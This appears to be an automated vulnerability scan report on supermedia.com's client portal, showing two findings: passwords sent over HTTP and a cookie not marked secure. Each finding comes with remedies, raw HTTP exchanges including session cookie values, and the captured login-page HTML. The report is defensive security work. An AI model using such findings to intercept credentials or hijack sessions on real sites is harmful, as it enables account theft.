<div id="dropDownShadow" ></div>
<div id="dropDownHolder" class="dropDownNavHolder">
</div>
<div class="nodisplay">
<div class="dropdown-content" id="online-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/business-listings/listing-enhancements-packages">Click packages</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/do-it-yourself">Do-it-yourself search marketing</a></li>
<li><a href="https://www.supermedia.com/local-search-marketing/services">Search marketing services</a></li>
<li><a href="https://www.supermedia.com/video-ads">Video ads</a></li>
<li><a href="https://www.supermedia.com/business-listings">Business listings</a></li>
<li><a href="https://www.supermedia.com/reputation-monitoring">Reputation monitoring</a></li>
<li><a href="https://www.supermedia.com/business-listings/coupons">Coupons</a></li>
</ul>
</div>

<div class="dropdown-content" id="print-advertising-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/print-advertising/yellow-pages">Yellow pages</a></li>
<li><a href="https://www.supermedia.com/print-advertising/white-pages">White pages</a></li>
<li><a href="https://www.supermedia.com/directory-options">Directory options</a></li>
</ul>
</div>

<div class="dropdown-content" id="direct-mail-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/direct-mail/postcards">Postcards</a></li>
<li><a href="https://www.supermedia.com/direct-mail/shared-card-packs">Shared card packs</a></li>
<li><a href="https://www.supermedia.com/direct-mail/call-tracking">Call tracking</a></li>
<li><a href="https://www.supermedia.com/direct-mail/compare-direct-mail-options">Compare options</a></li>
</ul>
</div>

<div class="dropdown-content" id="web-site-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/web-design">Web site design</a></li>
<li><a href="https://www.supermedia.com/web-hosting">Web site hosting</a></li>
<li><a href="https://www.supermedia.com/domain-names">Domain names</a></li>
<li><a href="https://www.supermedia.com/business-email">Business email</a></li>
</ul>
</div>

<div class="dropdown-content" id="packaged-solutions-dropdown-content">
<ul>
<li><a href="https://www.supermedia.com/packaged-solutions/multi-product-packages">Multi-product packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/business-profile-packages">Business profile packages</a></li>
<li><a href="https://www.supermedia.com/packaged-solutions/auto-dealer-packages">Auto dealer packages</a></li>
</ul>
</div>
</div>
<script type="text/javascript">
function addDropDownShadow(){
var IMAGEWIDTH=220,IMAGEHEIGHT=260,SHADOWSIZE=10;
var contentWidth = $("#dropDownHolder").width();
var contentHeight= $("#dropDownHolder").height();
var contentPos= $("#dropDownHolder").offset();

//set shadow position
$("#dropDownShadow").css("top",contentPos.top);
$("#dropDownShadow").css("left",contentPos.left-SHADOWSIZE);

//now add image aligned at bottom
var imgStyle=' style="position:relative;left:0px;top:'+(contentHeight+SHADOWSIZE-IMAGEHEIGHT)+'" ';
var imgHTML= '<img src="https://www.supermedia.com/img/img-spportal/supermedia/backgrounds/dropdown-shadow-fixed-width.png" '+imgStyle+' />';
//alert(imgHTML);
$("#dropDownShadow").css("height",contentHeight+SHADOWSIZE);
$("#dropDownShadow").html(imgHTML);
$("#dropDownShadow").show();
}
var dropDownTimerHandle;
function clearDropDownTimer(){
if(dropDownTimerHandle!=0){
clearTimeout(dropDownTimerHandle);
}
dropDownTimerHandle= 0;
}
function setDropDownTimer(){
dropDownTimerHandle= setTimeout(function(){
$("#dropDownHolder").hide();
$("#dropDownShadow").hide();
},1000);
}
$(document).ready(function(){
$("#globalnav-list li a").each(function(){
if(document.getElementById($(this).attr("id")+'-dropdown-content')){
$(this).mouseover(function(){
clearDropDownTimer();
var pos= $(this).offset();
$("#dropDownHolder").css("left",pos.left+1);
$("#dropDownHolder").css("top",pos.top+35);
var dropDownSel= '#'+$(this).attr("id")+'-dropdown-content';
$("#dropDownHolder").html($(dropDownSel).html());
$("#dropDownHolder").show();
addDropDownShadow();
});
$(this).mouseout(function(){
setDropDownTimer();
});
}
});
$("#dropDownHolder a").mouseover(function(){
clearDropDownTimer();
});
$("#dropDownHolder").mouseout(function(){
clearDropDownTimer();
setDropDownTimer();
});
$("#dropDownHolder").mouseover..
Password Transmitted Over HTTP

Password Transmitted Over HTTP

1 TOTAL
IMPORTANT
CONFIRMED
1
Netsparker identified that password data is sent over HTTP.

Impact

If an attacker can intercept network traffic he/she can steal users credentials.

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input starting from the login process should only be served over HTTPS.
- /spportal/

/spportal/ CONFIRMED

http://www.supermedia.com/spportal/

Form target action

http://www.supermedia.com/spportal/forgotPwd.do

Request

GET /spportal/ HTTP/1.1
Referer: http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:02 GMT
Set-Cookie: JSESSIONID=6EE789CA7BB216AF3B210922AD30A088.app5-a1; Path=/,trafficSource=default; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,CstrStatus=U; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139e45525d5f4f58455e445a4a423660;path=/;httponly
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 8349






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



















<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/homepage.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/supermedia/homepage.js"></script>
<script type="text/javascript" src="js/remember.js"></script>

<META NAME="keywords" CONTENT="small business advertising, small business marketing, business advertising, business marketing, online marketing, online advertising, direct mail advertising, direct mail marketing, yellow pages advertising, yellow pages marketing">
<META NAME="description" CONTENT="Small business advertising and marketing provided by Super Media. Online and offline advertising services are available including pay per click, pay for calls, websites, yellow pages listings, direct mail listings and much more.">
<meta name="google-site-verification" content="xI_TN3NsQrUZhmtShUkzABGDmVdlqPgosij6bQzzlCY">


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="gethpCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="http://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/mbox.js"></script>






























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->



<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="http://view.atdmt.com/jaction/00asup_Retargeting_1"></s'+'cript>')</script><noscript><iframe src="http://view.atdmt.com/iaction/00asup_Retargeting_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>


<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="http://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="http://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="http://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="http://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="http://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="http://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="http://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="http://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="http://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="http://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="http://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





<div id="content-shadow" >


<div id = "everything_inner">
<DIV class="main_image" title="let's grow your business - see how">
<IMG alt="Turn clicks into customers" title="Turn clicks into customers"
src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg">

<DIV class="desc">
<DIV class="bannerblock" id="display-block">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</DIV>
</DIV>


<DIV class="image_thumb">
<span class="left-arrow" onclick="previousBanner(ind)">
<IMG alt="left" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/left-arrow.gif">
</span>

<UL>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg" onclick="var s=s_gi(s_account); s.linkTrackEvents='prop21'; s.prop21='HP Page: '; ">
<IMG alt="Turn clicks into customers" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/one.gif">
</A>

<DIV class="bannerblock">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg">
<IMG alt="Do you have any fans? - Reputation monitoring" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/two.gif"></A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/reputation-monitoring" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Reputation monitoring'; s.tl(this,'o','Homepg: Reputation monitoring');" class="banner_link"></a>
<H2 class="new-white-header">Do you have any fans?</H2>
<span class="new-white-subheader">Find out what people are saying about your business<br>
with our free reputation monitoring tools.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg">
<IMG alt="Refer a friend" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/three.gif">
</A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions/share-the-wealth" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Share The Wealth'; s.tl(this,'o','Homepg: Share The Wealth');" class="banner_link"></a>

<H2 class="new-white-header">Refer a friend</H2>
<span class="new-white-subheader">Save money on your advertising spend with<br> our Share The Wealth Program.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="http://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg">
<IMG alt="Connect with your customers" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/four.gif">
</A>

<img src="http://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Connect with customers'; s.tl(this,'o','Homepg: Connect with customers');" class="banner_link"></a>

<H2 class="new-white-header">Connect with your customers</H2>
<span class="new-white-subheader">We have advertising options tailored to meet your needs.</span>
<br/><br/><br/><br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
</UL>

<span class="right-arrow" onclick="nextBanner(ind)">
<IMG alt="right" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/right-arrow.gif">
</span>
<span class="divider">
<IMG alt="" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/divider-line.gif">
</span>
<span class="pause" onclick="pauseBanner()">
<IMG alt="" src="http://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/pause-button.gif">
</span>
</DIV>



<div id="sign-in-form">
<div class = "formbox">

<h3>Client Sign In</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do;jsessionid=6EE789CA7BB216AF3B210922AD30A088.app5-a1')"
action="/spportal/indexLogin.do;jsessionid=6EE789CA7BB216AF3B210922AD30A088.app5-a1" method="POST">
<table>
<tr>
<td width="70px">
<label>Email or ID:</label>
<br>
</td>
<td nowrap>
<input type="text" name="username" class="textfield" id="email-address" />
</td>
</tr>
<td>
<label>Password:</label>
</td>
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext"><a href="javascript:void(0);" onclick="$('#signinform').attr('action','http://www.supermedia.com/spportal/forgotPwd.do');$('#signinform').submit();" title="Forgot password?">Forgot password?</a></span>
<div class="btn_grey"><a onkeypress="return false" href="javascript:checkRememberme();" title="Sign in">Sign in</a></div>
</td>
</tr>
</table>
</form>
<span id="bottom-remember">
<input id="hp_remember_me" name="checkbox" type="checkbox" value="checkbox" >Remember me
<br></span>
<span id="bottom"><a href="http://www.supermedia.com/help/account-information/sign-in" title="SNew Clients">New Users</a> | <a ..
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.
- /spportal/

/spportal/ CONFIRMED

https://www.supermedia.com/spportal/

Identified Cookie

trafficSource

Request

GET /spportal/ HTTP/1.1
Referer: https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.supermedia.com
Cookie: JSESSIONID=D61798579F75CB8CC29455B745D6534F.app8-a1; NSC_xxx-tvqfsnfejb-dpn=ffffffff9482139f45525d5f4f58455e445a4a423660
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Unspecified
Date: Sat, 19 Mar 2011 11:57:03 GMT
Set-Cookie: trafficSource=default; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/,CstrStatus=U; Expires=Mon, 18-Apr-2011 11:57:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Connection: close
Cache-Control: private
Content-Encoding:
Content-Length: 8324






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Small Business Marketing and Internet Advertising | SuperMedia.com</title>



















<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="https://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">
<link rel="STYLESHEET" type="text/css" href="https://www.supermedia.com/spportal/style/supermedia/homepage.css">
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/supermedia/homepage.js"></script>
<script type="text/javascript" src="js/remember.js"></script>

<META NAME="keywords" CONTENT="small business advertising, small business marketing, business advertising, business marketing, online marketing, online advertising, direct mail advertising, direct mail marketing, yellow pages advertising, yellow pages marketing">
<META NAME="description" CONTENT="Small business advertising and marketing provided by Super Media. Online and offline advertising services are available including pay per click, pay for calls, websites, yellow pages listings, direct mail listings and much more.">
<meta name="google-site-verification" content="xI_TN3NsQrUZhmtShUkzABGDmVdlqPgosij6bQzzlCY">


<META http-equiv=Content-Type content="text/html; charset=utf-8">
</head>
<body onload="gethpCookie();" onunload="">
<!-- specify omniture report suite for analytics -->
<!-- SiteCatalyst code version: H.1. Copyright 1997-2005 Omniture, Inc.More info available at http://www.omniture.com --><script type="text/javascript" language="javascript"> // use the appropriate account based on the server var s_account="Superpagesadvert";</script>
<!-- output omniture header -->
<!-- SiteCatalyst code version: H.14. Copyright 1997-2007 Omniture, Inc. More info available at http://www.omniture.com --><script type="text/javascript" language="JavaScript" src="/spportal/js/s_code.js"></script><script type="text/javascript" language="JavaScript"><!--/* You may give each page an identifying name, server, and channel onthe next lines. */s.channel="";s.pagetype="";s.server="";s.referrer="https://www.supermedia.com/spportal/spportalFlow.do?fromPage=login&_flowId=loginact-flow";s.pageName="";s.prop1="";s.prop2="";s.prop3="Not Logged in";s.prop4="";s.prop5="";s.prop6="";s.prop7="";s.prop8="";s.prop9="";s.prop10="";s.prop11="";s.prop12="";s.prop13="";s.prop14="";s.prop15="";s.prop16="";s.prop17="";s.prop18="";s.prop19="";s.prop20="";s.prop21="";s.prop22="";s.prop23="";s.prop24="";s.prop25="";s.prop26="";s.prop27="";s.prop28="";s.prop29="";s.prop30="";/* Conversion Variables */s.zip="";s.purchaseID="";s.state="";s.events="";s.campaign="";s.products="";s.eVar1="";s.eVar2="";s.eVar3="";s.eVar4="";s.eVar5="";s.eVar6="";s.eVar7="";s.eVar8="";s.eVar9="";s.eVar10="";s.eVar11="";s.eVar12="";s.eVar13="";s.eVar14="";s.eVar15="";s.eVar16="";s.eVar17="";s.eVar18="";s.eVar19="";s.eVar20="";s.eVar21="";s.eVar22="";s.eVar23="";s.eVar24="";s.eVar25="";s.eVar26="";s.eVar27="";s.eVar28="";s.eVar29="";s.eVar30="";--></script>
<!-- Test & Target tracking - added 10/01 -->
<script type="text/javascript" src="https://www.supermedia.com/spportal/js/mbox.js"></script>






























<!-- Header Start -->






















<!-- Javascript to capture buttons from the landing pages in omniture -->
<script language="javascript" type="text/JavaScript">

</script>
<!-- End of 'capture' omniture code -->
<!-- Code to find isSecurePage Start -->


<!-- Code to find isSecurePage End -->
<!-- Atlas Code Start -->


<script language="javascript" type="text/JavaScript">document.write('<s'+'cript language="JavaScript" src="https://view.atdmt.com/jaction/00asup_RetargetingSecure_1"></s'+'cript>')</script><noscript><iframe src="https://view.atdmt.com/iaction/00asup_RetargetingSecure_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" ></iframe></noscript>



<!-- Atlas Code End -->



<div id="header">
<div id="top">





<a href="https://www.supermedia.com" title="SuperMedia"><img alt="SuperMedia" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/supermedia-logo.gif" width="173" height="55" border="0" class="title"/></a>



<div id="utility_nav">


<ul id="utility_nav-list">
<li><a href="https://www.supermedia.com/business-listings" title="Add/Edit A Free Listing">Add/Edit A Free Listing</a></li>
<li><a href="https://www.supermedia.com/about-us" title="About">About</a></li>
<li><a href="https://www.supermedia.com/help" class="utility" title="Support">Support</a></li>
<li>
<a href="https://www.supermedia.com/signin" title="Account Sign In"><b> Sign In</b></a>

</li>
</ul>


</div>



<div id="contactSalesDiv">
<!-- If not signed in show sales team info -->
<span id="customer-service-number">Order by phone&nbsp;(866) 311-4186</span>


</div>

<div id="globalnav">
<ul id="globalnav-list">



<li><a id="home" href="https://www.supermedia.com" title="Home">Home</a></li>
<li><a id="online-advertising" href="https://www.supermedia.com/online-advertising" title="Online Advertising">Online Advertising </a></li>
<li><a id="print-advertising" href="https://www.supermedia.com/print-advertising" title="Yellow Pages">Yellow Pages</a></li>
<li><a id="direct-mail" href="https://www.supermedia.com/direct-mail" title="Direct Mail">Direct Mail</a></li>
<li><a id="web-site" href="https://www.supermedia.com/web-sites" title="Web Sites">Web Sites</a></li>
<li><a id="packaged-solutions" href="https://www.supermedia.com/packaged-solutions" title="Packaged Solutions">Packaged Solutions</a></li>



</ul>
</div>
</div>
</div>






















<!-- Roll-over navigation menus -->


<!-- Header End -->





<div id="content-shadow" >


<div id = "everything_inner">
<DIV class="main_image" title="let's grow your business - see how">
<IMG alt="Turn clicks into customers" title="Turn clicks into customers"
src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg">

<DIV class="desc">
<DIV class="bannerblock" id="display-block">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</DIV>
</DIV>


<DIV class="image_thumb">
<span class="left-arrow" onclick="previousBanner(ind)">
<IMG alt="left" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/left-arrow.gif">
</span>

<UL>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image3/banner1.jpg" onclick="var s=s_gi(s_account); s.linkTrackEvents='prop21'; s.prop21='HP Page: '; ">
<IMG alt="Turn clicks into customers" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/one.gif">
</A>

<DIV class="bannerblock">
<a href="/business-listings/listing-enhancements-packages" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Turn clicks'; s.tl(this,'o','Homepg: Turn clicks');" class="banner_link"></a>

<H2 class="new-black-header">Turn clicks into customers</H2>
<span class="new-black-subheader">Our click packages connect you to online shoppers.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg">
<IMG alt="Do you have any fans? - Reputation monitoring" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/two.gif"></A>

<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image4/banner2.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/reputation-monitoring" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Reputation monitoring'; s.tl(this,'o','Homepg: Reputation monitoring');" class="banner_link"></a>
<H2 class="new-white-header">Do you have any fans?</H2>
<span class="new-white-subheader">Find out what people are saying about your business<br>
with our free reputation monitoring tools.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg">
<IMG alt="Refer a friend" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/three.gif">
</A>

<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image5/banner3.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions/share-the-wealth" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Share The Wealth'; s.tl(this,'o','Homepg: Share The Wealth');" class="banner_link"></a>

<H2 class="new-white-header">Refer a friend</H2>
<span class="new-white-subheader">Save money on your advertising spend with<br> our Share The Wealth Program.</span>
<br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">SEE HOW &raquo;</span></div>
</DIV>
</LI>
<LI>
<A href="https://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg">
<IMG alt="Connect with your customers" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/four.gif">
</A>

<img src="https://www.supermedia.com/spportal/cm/supermedia/homepage/image6/banner4.jpg" alt="" class="preloadImg">
<DIV class="bannerblock">
<a href="/client-solutions" onclick="var s=s_gi(s_account); s.linkTrackVars='prop21'; s.prop21='Homepg: Connect with customers'; s.tl(this,'o','Homepg: Connect with customers');" class="banner_link"></a>

<H2 class="new-white-header">Connect with your customers</H2>
<span class="new-white-subheader">We have advertising options tailored to meet your needs.</span>
<br/><br/><br/><br/><br/><br/><br/>
<div class="btn_big_orange"><span class = "btn_big_orange">LEARN MORE &raquo;</span></div>
</DIV>
</LI>
</UL>

<span class="right-arrow" onclick="nextBanner(ind)">
<IMG alt="right" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/right-arrow.gif">
</span>
<span class="divider">
<IMG alt="" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/divider-line.gif">
</span>
<span class="pause" onclick="pauseBanner()">
<IMG alt="" src="https://www.supermedia.com/spportal/img-spportal/supermedia/banners/homepage/pause-button.gif">
</span>
</DIV>



<div id="sign-in-form">
<div class = "formbox">

<h3>Client Sign In</h3>
<form id="signinform" name="signin" onkeypress="headerSignIn(event, this, '/spportal/indexLogin.do')"
action="/spportal/indexLogin.do" method="POST">
<table>
<tr>
<td width="70px">
<label>Email or ID:</label>
<br>
</td>
<td nowrap>
<input type="text" name="username" class="textfield" id="email-address" />
</td>
</tr>
<td>
<label>Password:</label>
</td>
<td>
<input type="password" name="password" class="textfield" id="password" AUTOCOMPLETE = "off"/>
<span class="subtext"><a href="javascript:void(0);" onclick="$('#signinform').attr('action','https://www.supermedia.com/spportal/forgotPwd.do');$('#signinform').submit();" title="Forgot password?">Forgot password?</a></span>
<div class="btn_grey"><a onkeypress="return false" href="javascript:checkRememberme();" title="Sign in">Sign in</a></div>
</td>
</tr>
</table>
</form>
<span id="bottom-remember">
